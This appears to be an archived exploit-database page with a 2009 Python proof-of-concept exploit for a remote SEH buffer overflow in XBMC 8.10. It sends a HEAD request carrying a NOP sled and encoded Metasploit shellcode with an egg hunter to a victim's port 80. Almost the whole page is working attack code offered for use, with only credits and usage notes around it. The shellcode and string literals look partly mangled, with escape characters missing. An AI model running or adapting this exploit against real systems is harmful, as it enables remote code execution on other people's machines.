Home / os / win10

xbmxhead-overflow.txt

Posted on 07 April 2009

#!/usr/bin/python
#[*] Usage : exploit.py [victime_ip]
#[*] Bug : 	    XBMC 8.10 (HEAD Request) Remote Buffer Overflow Exploit (SEH)
#[*] Refer :        http://www.milw0rm.com/exploits/8337
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D

#Note: The exploit take about 3 to 5 minutes to work depanding your ram.

import struct
import sys, socket

host = sys.argv[1]

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
payload=(
"x90"*639+"Dz27Dz27"+"x90"*8+
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x50x42x50x42x30x4bx58x45x34x4ex33x4bx58x4ex37"
"x45x30x4ax37x41x30x4fx4ex4bx38x4fx44x4ax51x4bx48"
"x4fx45x42x42x41x50x4bx4ex49x34x4bx48x46x33x4bx38"
"x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x37x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx33x46x35x46x52x46x50x45x57x45x4ex4bx38"
"x4fx55x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx54"
"x4bx38x4fx35x4ex31x41x50x4bx4ex4bx48x4ex51x4bx38"
"x41x50x4bx4ex49x58x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x36x4bx48x42x34x42x53x45x58x42x4cx4ax57"
"x4ex30x4bx38x42x54x4ex30x4bx38x42x47x4ex31x4dx4a"
"x4bx48x4ax56x4ax50x4bx4ex49x50x4bx48x42x38x42x4b"
"x42x50x42x30x42x30x4bx58x4ax56x4ex43x4fx35x41x43"
"x48x4fx42x36x48x55x49x48x4ax4fx43x58x42x4cx4bx57"
"x42x55x4ax56x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex36x43x36x42x30x5axEBx06x90x90xACx3BxE8x62"
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" # egg(bayd mghali :D)
"xefxb8x44x7Ax32x37x8bxfaxafx75xeaxafx75xe7xffxe7"
"x90"*27)



head  = "HEAD /"+payload+" HTTP/1.1
"
head += "Host: "+host+"
"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,80))
s.send(head + "

")
s.close()

 

TOP